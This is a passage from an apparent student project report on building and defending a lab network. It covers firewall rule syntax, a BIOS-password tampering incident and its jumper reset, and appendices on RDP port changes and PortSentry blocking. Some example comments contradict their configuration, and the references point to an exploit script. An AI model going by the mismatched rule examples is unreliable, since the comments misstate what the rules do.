1. Rules that are configured in the Firewall Rules format, and saved in this format

This format is used by the "Advanced Filtering" feature in order to insert generic

firewall rules.

2. Rules that belong to the firewall features. These rules are controlled by the

various tabs in the security screen, and have their own format

3. Implicit rules that are part and of network devices configuration. For example, the

security level (Minimum/Typical/High) or the Internet Connection Firewall

check box in a Connection Setting screen.

Firewall Rule

Firewall Rule is a generic API for controlling the firewall operation, providing you with

full control of matching and filtering. This is also the firewall external interface for tasks

that wish to configure firewall rules. Each firewall rule consists of a match section and an

action section. When a packet arrives at the firewall it will be scanned according to the

match section. If it passes the criteria in the match section, the rule action will be taken.

For example, take this advance filtering rule:

(rule

(0

(enabled(1))

(match

(ip_src_start(212.1.1.8))

(ip_src_end(121.1.1.233))

(ip_dst_start(0.0.0.0))

(ip_dst_end(255.255.255.255))

)

(action

108

(type(accept))

(log(1))

)

)

The match section will match packets that have a source IP in the range of 212.1.1.8-

212.1.1.233. If the packet is matched, the action to take is to accept the packet and to

generate a log message.

The important firewall actions are:

• Drop - drops the packet.

• Reject - drops the packet and sends an ICMP error or a TCP reset to the

origination peer.

• Accept - accepts the packet (stateful).

• Accept Packet - accepts the packet (stateless).

• Accept-NAT - for outbound packets: accepts the packet and NATs the source IP

address.

• Accept-Redirect - for inbound Packets: accepts the packet and NATs the

destination address (this action also known as DNAT or RNAT).

• Log - generates a log message.

• Call - calls a chain (see below).

Firewall Chain

A chain in the firewall is a list of rules, which are performed sequentially one after the

other. The chain lets you create a more complex and optimized firewall rule set. For

109

example, the core chain of the firewall is the input chain, which is called for inbound

packets only, and the outbound chain, which is called for outbound packets only. The

flow of a packet in the firewall chain is controlled by rules that have the Call as their

action section. A good example for the use of chains is the firewall GUI, which gives you

an interface to fill up several chains:

• Initial inbound: First rules performed by the firewall for inbound packets.

• Initial outbound: First rules performed by the firewall for outbound packets.

• Inbound/outbound chains for each device - chains that consist of rules to perform

when a packet is received/transmitted on a certain device.

• Final inbound: Last rules performed by the firewall for inbound packets.

• Final outbound: Last rules performed by the firewall for outbound packets.

Looking at firewall rules as an execution program to the data-path module, the Chain

represents calling to a function if some condition is matched. For instance, if the packet is

incoming on device 'dev0' call 'Inbound device chain'. Chains can also return a value

when their performance is over.

Rules and Chains Examples

Advance filter rg_conf API is a strong tool used to configure firewall rules in the most

flexible way. Residing in rg_conf/fw/policy it enables you to:

• Define several policies for the firewall.

• Group rules in a chain.

• Define initial and final rules.

110

• Define rules per device.

• Define rules that match Service, IP address, IP range, MAC address, and other

options such as fragments.

• Define action for rule: call for other chain, accept and create statefull inspection

connection, accept stateless, drop packet, reject.

• Define rules using a wildcard interface or a wildcard IP. For example: All LAN

devices/All WAN devices.

The advanced filter mechanism can be used as a platform for firewall chain call

precedence.

The rg_conf contains two main chains, used only to define the call order for chains:

• Inbound traffic (chain ID 1300)

• Outbound traffic (chain ID 1400)

Each one of the main chains is used only to define the call precedence for specific chains,

where specific rules are grouped.

The following is an example for rg_conf call chain:

(1300 // Chain 1300 - Inbound chain

(description(Inbound rules)) // Chain description

(type(5))

(output(0))

(rule

111

(0 // Rule 0 - Call Initial inbound chain

(enabled(1))

(action

(type(call))

(chain(900))

)

)

(1 // Rule 1 - Call device eth1 inbound rules

(enabled(1))

(action

(type(call))

(chain(1656))

)

(match

(if(eth1))

)

)

)

)

112

Chain calling order is predefined by system experts. Changing them may destabilize the

system security. It is not advised to modify the chain structure.

Advanced Filtering Rule - 1

The following is an example of an advanced filter rule (without service) that blocks all

communication from LAN host 192.168.1.15 to any WAN host.

(rule // Rule entry

(0 // Rule ID #0

(enabled(1)) // Rule is active

(match // Rule conditions

(ip_src_start(192.168.1.15)) // Rule source IP address

(ip_src_end(192.168.1.15)) // 192.168.1.15

(ip_dst_start(0.0.0.0)) // Rule destination IP address

(ip_dst_end(255.255.255.255)) // Any address:0.0.0.0-

255.255.255.255

(services) // No services for this rule

)

(action // Rule result

(type(drop)) // Drop packet

(log(0)) // Do not log

)

)

)

Advanced Filtering Rule - 2

The following is an advanced filter rule service example. This rule allows all HTTP

communication from any IP address to one of Yahoo!TM 's IPs:

(rule // Rule entry

113

(0 // Rule ID #0

(enabled(1)) // Rule is active

(match // Rule conditions

(ip_frag(0)) // Allow fragmented packets

(ip_src_start(0.0.0.0)) // Rule source IP address: any

address

(ip_src_end(255.255.255.255)) // 0.0.0.0 - 255.255.255.255

(ip_dst_start(66.218.71.198)) // Rule destination IP address:

(ip_dst_end(66.218.71.198)) // 66.218.71.198 (yahoo.com)

(services // Rule services: if packet match

the

(0 // following services:

(service_id(16777219)) // Use service 16777219 (HTTP): If

) // packet is TCP and destined

to port 80

)

)

(action // Rule result

(type(accept)) // Accept packet and open

connection

(log(1)) // Log this connection opening

)

)

)

Advanced MAC Filtering

The following is an example of an advanced filtering MAC rule example. Using an

advanced filter enables you to define sophisticated MAC filter rules, which match not

only MAC addresses, but protocols and ports as well. For example, you want to prevent

114

HTTP access from one of your LAN hosts, but to allow it other communications. Further

more, you would like to log each time it tries to connect to the HTTP server. The

following rule should be added in either the initial inbound chain, or the specific device

chain.

(rule

(0

(enabled(1))

(match

(mac_src(aa:bb:cc:dd:ee:ff)) // LAN host MAC address

(services

(0

(service_id(16777219)) // HTTP service ID

)

)

)

(action // Rule result

(type(drop)) // Accept packet and open

connection

(log(1)) // Log this connection opening

)

)

)

Another MAC filtering rule would be to deny all but a set of predefined MAC addresses

from accessing all ports and protocols. In this way you will be preventing all foreign

MACs from exploiting your network internet connection or using sniffing or password

cracking software. But even if a foreign PC is connected while all its services are denied

115

it is still considered a security breach. The best security measure would be to physically

secure the routers and switches of your LAN [whole section from 25].

5.2 Second Attack: Physical Attack

On Monday the 22nd of May, one day before the FYP report submission, and after an

absence of 2 days (weekend) from the Labs, we discovered upon switching on the

computers that the BIOS password had been changed. A display message asked us for the

“current password” before we could even enter the setup or load windows (the display

message appeared just as the computer was switched on).

Although we had researched and knew about such a threat (accessing BIOS settings,

including password, and modifying them), a misunderstanding in the course of the

semester lead our team to omit putting a password that could not be cracked. Hence, the

hackers were successful in spotting a dangerous security breach, and denied us of using

our computers (and hence our services).

The only way to fix this problem was to “physically” reset the BIOS password. This can

be done by opening the CPU case, and unplugging a 3 legged jumper (jumper 13) on the

mother board and re-plugging upon switching the computer ON. For more information on

how to prevent physical attacks, refer to section 2.1 (e.g. of counter-measures: lock the

case, set-up cameras…).

After we physically reset the passwords ourselves, everything went back to normal (with

no memory loss incurred) and we could log again to the Windows workstations and

servers. After checking the log files, and comparing the “vital company files” we created

with the backups, we were assured that no further internal attack was made.

116

Note that our team stopped monitoring the network on Monday, May 22, 2006 at

6:00pm, i.e. 18 hours before the report submission deadline in order to focus on

writing the report. Nonetheless, some colleagues of ours, working on their own

FYP’s in the computer labs, informed us that the hackers’ team showed up at

around 7:30pm on Monday, May 22, 2006, along with a person external to FEA, to

conduct some hacks on the network. Not only did they use outside help, but violated

a ‘cease-fire’ accord we had put into place to concentrate on writing the report.

117

Conclusion Network security is essential to any business or even home that has a network connected

to the outside world (by means of the Internet for example). Our FYP was conducted in

this sense. This report aims at being a proper documentation usable in any situation

where a network has to be built and secured.

In the first part of the report, we have briefly presented an overview of networks to fully

understand the way in which they operate. Then, we have explored the theory of network

security. We have seen that it can be dissected according to the network layers, and the

corresponding security of each was discussed in depth. However, this does not cover all

aspects of network security. An attack through a given layer (for instance IP session

hijacking on the network layer) can lead to a breach on another layer (for example

sending malicious code on application layer). Therefore, it is important to keep in mind

that network security should be seen as a whole, even though it is divided into different

layers. Then, we have presented a survey of the most common threats and the ways they

should be dealt with, as to properly secure a network, it is important to know the enemy.

Topics such as attacks automated by malicious codes, denial of service (DoS) and Social

Engineering were covered.

After this ‘theory’ part of the report, we have documented all the process that lead to the

installation and defense of the network. Our network topology was presented (hierarchal

star topology to simulate a real business environment), as well as the means in which we

secured the perimeter (using a Lynksys Firewall). Then, we described the way in which

we installed the network (from installing the Operating Systems to creating a domain),

and went on to document the steps we took to secure it. We started by downloading all

118

relevant patches and service packs, then went on to disable the USB ports to protect the

network against flash drives, and ran some free ware tools such as LanGuard and Event

Alarm to tighten and monitor the security.

Once our secured network was up-and-running, we started to work on ways to optimize

security and monitoring. First, we customized a Honey D program to our network’s

topology and needs (using Fedora) to confuse the hackers (when conducting external

attacks). Then, we wrote a windows program that monitored the user logs: the output of

the program was a log file with the username of each user that has logged in, as well as

the time of logging in and out. In this way, internal attacks were spotted more easily and

dealt with in a faster and hence more efficient way.

Finally, the report also gives a full documentation of the attacks that were performed by

the hackers’ team. Although this was meant to be an exciting part of our FYP, the

hackers’ team was late in starting those attacks and hence not a lot of security breaches

were reported.

The FYP was a chance for us to be exposed to windows and UNIX network security, and

gave us much needed exposure to these Operating Systems. Not only did we learn about

the theory behind network security, we also applied it and ‘lived’ it throughout the

second half of the year. We also contributed to the field by introducing Honey D’s as

important and useful tools (they are not commonly used in businesses), as well as

creating a program that can enable a network administrator to monitor and archive the

logs. Many other contributions can be introduced in future work, as the network security

field is a really wide one!

119

Reference

1. Majari, S.A. “Security Engineering: Survey Analysis and Practical Guidelines for

a multi-dimensional layered security”, 2004.

2. Cisco Systems “Interconnecting Cisco Network Devices – Student Guide”

3. Ford, D. “8 Simple Rules For Securing Your Internal Network”, 2003

4. Lai, Hock, Tai “Windows 2000 vulnerabilities and Solutions”, 2003

5. http://www.atstake.com/research/advisories/2001/Outlook-NT4SP6a-

BufferOverflow.vcf

6. www.securityfocus.com/data/vulnerabilities/exploits/wins2.pl

7. http://www.atruereview.com/articles/winsecurity.php

8. http://en.wikipedia.org/wiki/Network_topology

9. “Cisco Integrated Firewall Solutions” (data sheet):

http://www.cisco.com/application/pdf/en/us/guest/netsol/ns118/c654/cdccont_090

0aecd800eed2e.pdf

10. “Perimeter Security: A Security Blueprint for Enterprise Network”, Cisco White

Paper, no date available

11. “The Evolution of Network Security: From DMZ Designs to Devices”,

Metagroup White Paper, May 2004)

12. Curtin, M. “Introduction to Network Security”, March 1997

13. Blaze M., Ionnadis J., Keromytis A.D. “Trust Management and Network Layer

Security”, AT&T Laboratories – Research

14. http://library.thinkquest.org/04oct/00460/netwAttack.html

120

15. http://www.comptechdoc.org/independent/security/recommendations/secattacks.h

tml

16. http://www.insecure.org/sploits/l0phtcrack.lanman.problems.html

17. http://www.securitydocs.com/library/2695

18. http://labmice.techtarget.com/articles/usbflashdrives.htm

19. http://www.jsifaq.com trick number 7093

20. A Virtual Honeypot Framework: http://niels.xtdnet.nl/papers/honeyd.pdf

21. Specter: http://www.specter.com

22. Honeyd: http://www.citi.umich.edu/u/provos/honeyd/

23. Decoy Server: http://www.recourse.com

24. Honeynets: http://project.honeynet.org/papers/honeynet/

25. www.jungo.com

121

Appendix

Appendix A

Source: http://support.microsoft.com/default.aspx?scid=187623

1. Run Regedt32 and go to this key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

NOTE: The above registry key is one path; it has been wrapped for readability.

2. Find the "PortNumber" subkey and notice the value of 00000D3D, hex for (3389). Modify the port number in Hex and save the new value. To change the port for a specific connection on the Terminal Server:

• Run Regedt32 and go to this key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\connection

NOTE: The above registry key is one path; it has been wrapped for readability.

3. Find the "PortNumber" subkey and notice the value of 00000D3D, hex for (3389). Modify the port number in Hex and save the new value. NOTE: Because the use of alternate ports has not been fully implemented for Terminal Server 4.0, support will be provided as "reasonable effort" only, and Microsoft may require you to set the port back to 3389, if any problems occur.

Appendix B: PortSentry

1. Download and unzip source code: o Download: PortSentry source code (from

http://sourceforge.net/projects/sentrytools) (Note: Portsentry version 1.1 includes a bug fix required for Red Hat 7.1 kernel 2.4)

o Move to your source directory and unzip: tar -xzf portsentry-1.1.tar.gz

122

2. Edit include file and compile: cd portsentry-1.1/ Read file README.install. It details the following:

o

Edit file: portsentry_config.h

Set options:

CONFIG_FILE - PortSentry run-time configuration file. WRAPPER_HOSTS_DENY - The path and name of TCP wrapper

hosts.deny file.

#define CONFIG_FILE "/opt/portsentry/portsentry.conf" #define WRAPPER_HOSTS_DENY "/etc/hosts.deny" #define SYSLOG_FACILITY LOG_DAEMON #define SYSLOG_LEVEL LOG_NOTICE

(Note: we use /opt/portsentry/ because we can locate custom files/software there. It allows for an easy backup by separating it from the OS. If you prefer, you can use /etc/portsentry/ for configurations files and follow the Linux/Unix file system logic)

The above default, "LOG_DAEMON", will log messages to the /var/log/messages file.

To log to a separate file dedicated to PortSentry logging: (This will eliminate logging clutter in the main system logging file)

Add logging directives to syslogd configuration file: /etc/syslog.conf

Change the following line to reflect that portsentry messages are not going to be logged to the regular syslog output file /var/log/messages

*.info;mail.none;news.none;authpriv.none;local6.none /var/log/messages

Add the following line to assign a portsentry log facility:

local6.* /var/log/portsentry.log

Note: Use tab not spaces in the syslog configuration file.

123

Restart syslogd: /etc/rc.d/init.d/syslog restart

Set portsentry_config.h entry to new log facility: #define SYSLOG_FACILITY LOG_LOCAL6

Options for the SYSLOG_FACILITY are defined in /usr/include/sys/syslog.h They include:

SYSLOG_FACILITY Facility Name Description LOG_LOCAL0 local0 reserved for local use LOG_LOCAL1 local1 reserved for local use LOG_LOCAL2 local2 reserved for local use LOG_LOCAL3 local3 reserved for local use LOG_LOCAL4 local4 reserved for local use LOG_LOCAL5 local5 reserved for local use LOG_LOCAL6 local6 reserved for local use LOG_LOCAL7 local7 reserved for local use LOG_USER user random user-level messages LOG_MAIL mail mail system LOG_DAEMON daemon system daemons LOG_SYSLOG syslog messages generated internally by syslogd LOG_LPR lpr line printer subsystem LOG_NEWS news network news subsystem LOG_UUCP uucp UUCP subsystem LOG_CRON cron clock daemon LOG_AUTHPRIV authpriv security/authorization messages (private) LOG_FTP ftp ftp daemon

Options for the SYSLOG_LEVEL include:

SYSLOG_LEVEL Priority Description LOG_EMERG 0 system is unusable LOG_ALERT 1 action must be taken immediately LOG_CRIT 2 critical conditions LOG_ERR 3 error conditions LOG_WARNING 4 warning conditions

124

LOG_NOTICE 5 normal but significant condition LOG_INFO 6 informational LOG_DEBUG 7 debug-level messages

o

Edit file: portsentry.conf to set paths for configuration files and ports to monitor.

IGNORE_FILE="/opt/portsentry/portsentry.ignore" HISTORY_FILE="/opt/portsentry/portsentry.history" BLOCKED_FILE="/opt/portsentry/portsentry.blocked" KILL_ROUTE="/sbin/route add -host $TARGET$ reject" - Generic Unix KILL_ROUTE iptables/ipchains options below are better

Uncomment and modify if necessary the appropriate statements. The TCP_PORTS=, UDP_PORTS= lists are ignored for stealth scan detection modes. We added UDP port 68 (BOOTP) and TCP 21 (ftp), 22 (ssh), 25 (smtp mail), 53 (dns bind), 80 (http web server), 119 (news) to the ADVANCED_EXCLUDE_UDP and ADVANCED_EXCLUDE_TCP statements respectively.

ADVANCED_EXCLUDE_TCP="21,22,25,53,80,110,113,119" - server ADVANCED_EXCLUDE_UDP="21,22,53,110,520,138,137,68,67" OR ADVANCED_EXCLUDE_TCP="113,139" - workstation ADVANCED_EXCLUDE_UDP="520,138,137,68,67"

List of ports used by Remote Access trojans

PAM options:

125

KILL_HOSTS_DENY="ALL: $TARGET$"

For more on PAM see YoLinux network Admin Tutorial

Route deny options: (Options: network "route" or firewall command "iptables/ipchains")

Simple method to drop network return routes if ipchains are not compiled into your kernel: KILL_ROUTE="/sbin/route add -host $TARGET$ reject" You can check the addresses dropped with the command: netstat -rn They will be routed to interface "-".

For Linux 2.2.x kernels (version 2.102+) using ipchains: (Best option) KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l" OR KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY" Note: The second option is without the "-l" or logging option so ipchains won't keep logging the portscan in /var/log/messages

For those using iptables (RH 7.1+ Linux Kernel 2.4+): KILL_ROUTE="/sbin/iptables -I INPUT -s $TARGET$ -j DROP" (Note: The default used in portsentry.conf uses the incorrect path for Red Hat. Change /usr/local/bin/iptables to /sbin/iptables)

Note on Red Hat 7.1: During installation/upgrade the firewall configuration tool /usr/bin/gnome-lokkit may be invoked. It will configure a firewall using ipchains and will add this to your boot process. To see if ipchains and the Lokkit configuration is invoked during system boot, use the command: chkconfig --list | grep ipchains. You can NOT use portsentry to issue iptables rules if ipchain rules have been issued previously. More info on iptables and ipchains support/configuration in Red Hat 7.1 and kernel 2.4.

Edit file: portsentry.ignore (contains IP addresses to ignore. )

127.0.0.1 0.0.0.0 Your IP address

The at Home network routinely scans for news servers on port 119 from a server named authorized-scan1.security.home.net. Adding the IP address

126

of this server (24.0.0.203) greatly reduces the logging. I also added their BOOTP server. (24.9.139.130)

We manually issued the iptables (RH 7.1 kernel 2.4) commands on my workstation to drop the hosts and deny their scans. At Home users may add the commands to the file /etc/rc.d/rc.local

/sbin/iptables -I INPUT -s 24.0.0.203 -j DROP /sbin/iptables -I INPUT -s 24.9.139.130 -j DROP

Edit file: Makefile

INSTALLDIR = /opt

And remove the line under "uninstall": (dangerous line!!)

# /bin/rmdir $(INSTALLDIR)

And remove the line under "install": (troublesome line!!)

# chmod 700 $(INSTALLDIR)

Compile: make linux

Install (as root): make install

Run PortSentry for advanced UDP/TCP stealth scan detection: portsentry -atcp portsentry -audp

OR use init scripts below in next section.

127

Check logfile for hacker attacks. See: /var/log/messages or /var/log/portsentry.log if you are logging to a dedicated file. Also check /etc/hosts.deny to see a list of IP addresses that PortSentry has deamed attackers. Check the "HISTORY_FILE" /opt/portsentry/portsentry.history

Note: Is is possible to have all logging sent to a logging daemon on a single server. This will allow the administrator to check the logs on only one server rather than individually on many.

Note on Red Hat 7.1: Red Hat Powertools 7.1 now includes portsentry 1.0. I reccomend using version 1.1 configured as above. Powertools RPM layout:

• /usr/sbin/portsentry - (chmod 700) executable • /etc/portsentry/ - (chmod 700) Directory used for configuration files. • /etc/portsentry/portsentry.conf (chmod 600) • /etc/portsentry/portsentry.ignore (chmod 600) • /var/portsentry/portsentry.history • /var/portsentry/portsentry.blocked

Instead of using a firewall command (ipchains/iptables), a false route is used: /sbin/route add -host $TARGET$ gw 127.0.0.1. My init script calls the portsentry executable twice with the apropriate command line arguments to monitor tcp and udp ports. The Red Hat 7.1 init script uses the file /etc/portsentry/portsentry.modes and a for loop in the init script to call portsentry the appropriate number of times. Their init script also recreates the portsentry.ignore file each time portsentry is started by including the IP addresses found with ifconfig and the addresses 0.0.0.0 and localhost. Persistent addresses must be placed above a line stating: Do NOT edit below this otherwise it is not included in the creation of the new file.

128

Appendix C: Timeline and Budget

After conducting an extensive literature survey in the fall semester, and learning about

network security theory, we began installing the network as the spring semester was

starting and worked on the ‘practical’ part of the FYP according to the following

timeline:

• Feb 15th to March 1st: installing the additional RAMs on the computer, installing

the Operating Systems and ordering the Firewall/switch.

• March 1st to March 31st: Setting up the network (domain, user accounts…) and

increasing network security (patches, services packs, server settings…).

• March 15th to March 31st: Researching Honey Pots.

• March 15th to March 31st: Researching on ways to monitor the Logs (log files).

• April 1st and onwards: The external attacks were supposed to start, but the

hacker team did not show up until end of April – beginning of May.

• April 1st to April 30th: Writing the Code for the Log Monitor, testing it and

installing it on our network (this program was not as necessary during external

attacks as it was during internal attacks). Note that since we had a few problems

when installing the code on Windows 2000 (it was written on XP – refer to

section 4.6), the program was operational a little late of schedule (around May

5th). Nonetheless, this did not affect our security since the hackers’ team had

not even started the internal attacks by that time.

• April 1st onwards: choosing the appropriate Honey Pot (Honey D), installing it

and configuring it according to our network’s needs.

129

• The attacks effectively took place during the last 2 or 3 weeks before FYP report

submission date (i.e. May 22). Note that our team stopped monitoring the

network on Monday, May 22, 2006 at 6:00pm, i.e. 18 hours before the report

submission deadline in order to focus on writing the report.

Budget:

• Firewall/Switch: $89.00 (paid by AUB)

• Additional RAMs: $120.00 (paid by AUB)

• Printing Reports (Spring + Fall): $100.00

• TOTAL COST: $309.00

130